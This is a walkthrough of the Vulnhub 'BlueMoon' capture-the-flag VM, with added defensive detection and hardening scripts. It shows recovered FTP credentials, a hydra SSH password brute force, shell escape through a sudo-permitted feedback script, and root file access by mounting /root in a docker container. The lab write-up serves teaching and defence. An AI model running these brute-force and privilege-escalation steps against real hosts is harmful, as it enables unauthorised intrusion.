Bluemoon
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ sudo netdiscover -i eth
Currently scanning: 192.168.92.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:fd:b9:2d 1 60 PCS Systemtechnik GmbH
192.168.56.117 08:00:27:14:4c:68 1 60 PCS Systemtechnik GmbH 1
Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.117.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.117 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-14 21:46 EST
Nmap scan report for bogon (192.168.56.117)
Host is up (0.00032s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 2c:e2:63:78:bc:55:fe:f3:cb:09:a9:d8:26:2f:cb:d5 (RSA)
| 256 c4:c8:6b:48:92:25:a5:f7:00:9f:ab:b2:56:d5:ed:dc (ECDSA)
|_ 256 a9:5b:39:a1:6e:05:91:0f:75:3c:88:0b:55:7c:a8:c2 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: BlueMoon:2021
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:14:4C:68 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.61 seconds
The target host has 3 open ports: 21 (FTP), 22 (SSH) and 80 (HTTP).
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ searchsploit vsftpd 3.0.3
------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 3.0.3 - Remote Denial of Service | multiple/remote/49719.py
------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ ftp 192.168.56.117
Connected to 192.168.56.117.
220 (vsFTPd 3.0.3)
Name (192.168.56.117:kali): anonymous
530 Permission denied.
ftp: Login failed
ftp> quit
221 Goodbye.
The vsftpd FTP service has no exploitable vulnerability, and anonymous login is not allowed.
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ steghide extract -sf .blue.jpg
Enter passphrase
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ stegseek .blue.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.91% (133.3 MB)
[!] error: Could not find a valid passphrase.
The image downloaded to the local Kali Linux machine appears to be passphrase-protected, but cracking the passphrase failed.
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ curl http://192.168.56.117/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.117 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ gobuster dir -u http://192.168.56.117 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.117
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/14 22:03:52 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 279]
/hidden_text (Status: 200) [Size: 1169]
Progress: 219133 / 220561 (99.35%)===============================================================
2022/11/14 22:04:35 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ curl http://192.168.56.117/hidden_text
<!doctype html>
<html>
<head>
<title>Undergoing Work</title>
<link rel="icon" href=".blue.jpg" type="image/icon type">
<meta charset="utf-8" />
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<style type="text/css">
body {
background-color: #f0f0f2;
margin: 0;
padding: 0;
font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;
}
div {
width: 600px;
margin: 5em auto;
padding: 2em;
background-color: #fdfdff;
border-radius: 0.5em;
box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);
}
a:link, a:visited {
color: #38488f;
text-decoration: none;
}
@media (max-width: 700px) {
div {
margin: 0 auto;
width: auto;
}
}
</style>
</head>
<body>
<div>
<h1>Maintanance!</h1>
<p>Sorry For Delay. We Will Recover Soon. </p>
<p><a href=".QR_C0d3.png">Thank You ...</a></p>
</div>
</body>
</html>
The directory scan found /hidden_text. Opening it in a browser, the returned page contains a hidden image, which is a QR code; scanning it yields the following script (shown here with its line breaks and the here-document redirect restored):
#!/bin/bash
HOST=ip
USER=userftp
PASSWORD=ftpp@ssword
ftp -inv $HOST <<EOF
user $USER $PASSWORD
bye
EOF
This should be the FTP username and password; let's try it:
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ ftp 192.168.56.117
Connected to 192.168.56.117.
220 (vsFTPd 3.0.3)
Name (192.168.56.117:kali): userftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||61671|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 147 Mar 07 2021 information.txt
-rw-r--r-- 1 0 0 363 Mar 07 2021 p_lists.txt
226 Directory send OK.
ftp> get information.txt
local: information.txt remote: information.txt
229 Entering Extended Passive Mode (|||35007|)
150 Opening BINARY mode data connection for information.txt (147 bytes).
100% |**************************************************************************************************| 147 163.68 KiB/s 00:00 ETA
226 Transfer complete.
147 bytes received in 00:00 (77.89 KiB/s)
ftp> get p_lists.txt
local: p_lists.txt remote: p_lists.txt
229 Entering Extended Passive Mode (|||61257|)
150 Opening BINARY mode data connection for p_lists.txt (363 bytes).
100% |**************************************************************************************************| 363 3.14 KiB/s 00:00 ETA
226 Transfer complete.
363 bytes received in 00:00 (3.12 KiB/s)
ftp> ls -alh
229 Entering Extended Passive Mode (|||22391|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Mar 07 2021 .
drwxr-xr-x 3 1001 1001 4096 Mar 07 2021 ..
-rw-r--r-- 1 0 0 147 Mar 07 2021 information.txt
-rw-r--r-- 1 0 0 363 Mar 07 2021 p_lists.txt
226 Directory send OK.
ftp> quit
221 Goodbye.
Let's look at the contents of the files downloaded from the FTP server to the local Kali Linux machine:
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ ls
information.txt nmap_full_scan p_lists.txt
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ cat information.txt
Hello robin ...!
I'm Already Told You About Your Password Weekness. I will give a Password list. you May Choose Anyone of The Password.
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ cat p_lists.txt
h4ck3rp455wd
4dm1n
Pr0h4ck3r
5cr1ptk1dd3
pubgpr0pl4yer
H34d5h00t3r
p@ssw0rd
@@d1dn0tf1nd
J4ck_5p4rr0w
c4pt10n_jack
D0veC4m3r0n
f1nnb4l0r
r0manr3ing5
s3thr0lin5
Demonk1ng
R4ndy0rton
Big_sh0w
j0hnc3na
5tr0ngp@ssw0rd
S4br1n4
4nnlyn
C4rp3nt3r
K0fiKing5t0n
chNAMPIN
Herr0lins
G0palT0p3r
Log3shDriv3r
k4rv3ndh4nh4ck3r
P0nmuGunth0n
Shank3rD3v
KishorMilkV4n
S4th15hR4cer
This hints that the username is robin, and p_lists.txt can serve as the wordlist; next, use hydra to crack the SSH password:
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ hydra -l robin -P p_lists.txt 192.168.56.117 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-14 22:12:09
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 32 login tries (l:1/p:32), ~2 tries per task
[DATA] attacking ssh://192.168.56.117:22/
[22][ssh] host: 192.168.56.117 login: robin password: k4rv3ndh4nh4ck3r
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-14 22:12:16
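From the defender's side, the hydra run above leaves a very recognisable trace in the target's sshd log: a burst of "Failed password" lines from one source, followed by an "Accepted password" for the same user. The following is an added example (not part of the original walkthrough) that detects both patterns over constructed syslog-style sshd lines; the IPs, PIDs and port numbers in the sample are made up for the demo.

```shell
#!/bin/sh
# Added example: detect the SSH password-guessing burst produced by hydra above.
# SAMPLE_LOG is constructed for the demo; in practice pipe in /var/log/auth.log.
SAMPLE_LOG='Nov 14 22:12:09 BlueMoon sshd[1201]: Failed password for robin from 192.168.56.105 port 40102 ssh2
Nov 14 22:12:09 BlueMoon sshd[1203]: Failed password for robin from 192.168.56.105 port 40104 ssh2
Nov 14 22:12:10 BlueMoon sshd[1205]: Failed password for robin from 192.168.56.105 port 40106 ssh2
Nov 14 22:12:10 BlueMoon sshd[1207]: Failed password for invalid user admin from 192.168.56.105 port 40108 ssh2
Nov 14 22:12:11 BlueMoon sshd[1209]: Failed password for robin from 192.168.56.105 port 40110 ssh2
Nov 14 22:12:16 BlueMoon sshd[1233]: Accepted password for robin from 192.168.56.105 port 40160 ssh2
Nov 14 22:30:01 BlueMoon sshd[1300]: Failed password for robin from 192.168.56.1 port 50000 ssh2'

# Read sshd log lines on stdin; print "count ip" for each source with more than
# $1 failed password attempts (default 3). Handles "for user" and "for invalid user X".
ssh_bruteforce_sources() {
    awk -v t="${1:-3}" '
        function src(  i) { for (i = 1; i <= NF; i++) if ($i == "from") return $(i+1); return "" }
        /sshd\[[0-9]+\]: Failed password for/ { f[src()]++ }
        END { for (ip in f) if (f[ip] > t) print f[ip], ip }
    '
}

# Read sshd log lines on stdin; print "failures ip" for sources that failed at least
# $1 times and then logged in successfully: a guessed password, as with robin above.
ssh_guessed_logins() {
    awk -v t="${1:-3}" '
        function src(  i) { for (i = 1; i <= NF; i++) if ($i == "from") return $(i+1); return "" }
        /sshd\[[0-9]+\]: Failed password for/   { f[src()]++ }
        /sshd\[[0-9]+\]: Accepted password for/ { ip = src(); if (f[ip] >= t) hit[ip] = f[ip] }
        END { for (ip in hit) print hit[ip], ip }
    '
}
```

Both functions are pipeline filters, e.g. `printf '%s\n' "$SAMPLE_LOG" | ssh_guessed_logins 3`; on the sample they report 192.168.56.105 with 5 failures, while the single failure from 192.168.56.1 stays below the threshold.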
┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]
└─$ ssh [email protected]
The authenticity of host '192.168.56.117 (192.168.56.117)' can't be established.
ED25519 key fingerprint is SHA256:C+Z/8na2o0LXAqk7WswSnNQya1ZPegq4CyO9DR+VXTw.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.117' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux BlueMoon 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 4 07:43:48 2021 from 192.168.43.44
robin@BlueMoon:~$ id
uid=1000(robin) gid=1000(robin) groups=1000(robin),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
robin@BlueMoon:~$
Successfully obtained a shell as user robin.
robin@BlueMoon:~$ sudo -l
Matching Defaults entries for robin on bluemoon:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User robin may run the following commands on bluemoon:
(jerry) NOPASSWD: /home/robin/project/feedback.sh
robin can run the feedback.sh script as jerry without a password; let's see whether that directly yields a shell as jerry.
Script For FeedBack
Enter Your Name : jason
Enter You FeedBack About This Target Machine : /bin/bash
id
uid=1002(jerry) gid=1002(jerry) groups=1002(jerry),114(docker)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
jerry@BlueMoon:/home/robin$ cd /home
jerry@BlueMoon:/home$ ls
jerry robin userftp
jerry@BlueMoon:/home$ cd jerry
jerry@BlueMoon:~$ ls -alh
total 32K
drwxr-xr-x 3 jerry jerry 4.0K Apr 4 2021 .
drwxr-xr-x 5 root root 4.0K Mar 8 2021 ..
-rw------- 1 jerry jerry 16 Nov 14 19:16 .bash_history
-rw-r--r-- 1 jerry jerry 220 Apr 17 2019 .bash_logout
-rw-r--r-- 1 jerry jerry 3.5K Apr 17 2019 .bashrc
drwxr-xr-x 3 jerry jerry 4.0K Mar 8 2021 .local
-rw-r--r-- 1 jerry jerry 807 Apr 17 2019 .profile
-rw-r----- 1 jerry jerry 178 Mar 8 2021 user2.txt
jerry@BlueMoon:~$ cat user2.txt
You Found User-2 Flag
==> Fl4g{Y0ur34ch3du53r25uc355ful1y}
You Are Reached Near To Me... Try To Find
- Root
jerry@BlueMoon:~$ cd .local
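The VM's own feedback.sh is not shown on the page, but the behaviour above (typing /bin/bash as the "feedback" spawns a shell as jerry) is what happens when a script lets the shell expand user input as a command. The following added example, not the VM's script, shows how the same prompts can be handled safely: every answer is validated, quoted and written with printf, never evaluated. FEEDBACK_FILE and the `--interactive` flag are assumptions of this example.

```shell
#!/bin/sh
# Added example of a hardened feedback script; not the VM's feedback.sh.
# User input is treated strictly as data and is never expanded as a command.
FEEDBACK_FILE="${FEEDBACK_FILE:-/tmp/feedback.log}"   # assumed location

# Accept only non-empty, bounded, printable single-line text.
valid_field() {
    [ -n "$1" ] && [ "${#1}" -le 500 ] || return 1
    case "$1" in
        *[![:print:]]*) return 1 ;;   # control characters, tabs and newlines rejected
    esac
    return 0
}

# Append "name<TAB>feedback" to the log; return 1 and write nothing on invalid input.
# Because the values are only ever quoted arguments to printf, a "feedback" such as
# /bin/bash or $(id) is stored literally and never executed.
save_feedback() {
    valid_field "$1" && valid_field "$2" || return 1
    printf '%s\t%s\n' "$1" "$2" >> "$FEEDBACK_FILE"
}

# Interactive prompts mirroring the ones seen above; run with: sh feedback.sh --interactive
if [ "${1:-}" = "--interactive" ]; then
    printf 'Enter Your Name : '; read -r fb_name
    printf 'Enter You FeedBack About This Target Machine : '; read -r fb_text
    if save_feedback "$fb_name" "$fb_text"; then
        echo "Thanks, your feedback was recorded."
    else
        echo "Invalid input, nothing recorded." >&2
        exit 1
    fi
fi
```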
Privilege escalation
jerry@BlueMoon:~/.local$ id
uid=1002(jerry) gid=1002(jerry) groups=1002(jerry),114(docker)
User jerry is a member of the docker group, and the docker daemon runs as root, so we can mount the host's filesystem into a container:
jerry@BlueMoon:~$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
alpine latest 28f6e2705743 21 months ago 5.61MB
jerry@BlueMoon:~$ docker run -v /root:/mnt -it -alpine
invalid argument "lpine" for "-a, --attach" flag: valid streams are STDIN, STDOUT and STDERR
See 'docker run --help'.
jerry@BlueMoon:~$ docker run -v /root:/mnt -it alpine
/ # ls
bin etc lib mnt proc run srv tmp var
dev home media opt root sbin sys usr
/ # cd /root
~ # cd /mnt
/mnt # ls
root.txt
/mnt # cat root.txt
==> Congratulations <==
You Reached Root...!
Root-Flag
Fl4g{r00t-H4ckTh3P14n3t0nc34g41n}
Created By
Kirthik - Karvendhan
instagram = ____kirthik____
!......Bye See You Again......!
/mnt #
Successfully obtained the root flag!!!
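The two host misconfigurations exploited in this walkthrough, a NOPASSWD sudo rule pointing at a script in a user's home directory and a non-root user in the docker group, are both visible in plain configuration. The following is an added audit example (not from the original walkthrough) that reports them; it runs here on constructed /etc/group and `sudo -l` text reproducing what the page shows, and in real use would be fed the live files.

```shell
#!/bin/sh
# Added example: audit for the docker-group and NOPASSWD findings seen above.
# Both inputs are constructed for the demo; feed /etc/group and `sudo -l -U <user>` in practice.
SAMPLE_GROUP='root:x:0:
sudo:x:27:
docker:x:114:jerry
robin:x:1000:'

SAMPLE_SUDO_L='Matching Defaults entries for robin on bluemoon:
    env_reset, mail_badpass
User robin may run the following commands on bluemoon:
    (jerry) NOPASSWD: /home/robin/project/feedback.sh
    (root) /usr/bin/apt'

# Read /etc/group text on stdin; print members of the docker group, one per line.
# Membership is equivalent to root: the daemon runs as root and will bind-mount any
# host path, as the "docker run -v /root:/mnt" step above demonstrates.
docker_group_members() {
    awk -F: '$1 == "docker" && $4 != "" { n = split($4, u, ","); for (i = 1; i <= n; i++) print u[i] }'
}

# Read `sudo -l` output on stdin; print "runas path" for NOPASSWD rules whose target
# lives outside the system binary directories (home directories, /tmp, /opt ...).
# Such targets are typically editable by the invoking user, which defeats the rule.
# Assumes the command has no arguments, so the path is the last field.
nopasswd_nonsystem_targets() {
    awk '
        /NOPASSWD:/ {
            runas = $1; gsub(/[()]/, "", runas)
            path = $NF
            if (path !~ /^\/(usr|bin|sbin|etc)\//) print runas, path
        }'
}
```

Remediation for the findings this reports is the usual one: keep the sudo target in a root-owned, non-writable location and remove interactive users from the docker group (or run the daemon with user namespace remapping).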
From: https://www.cnblogs.com/jason-huawen/p/16891903.html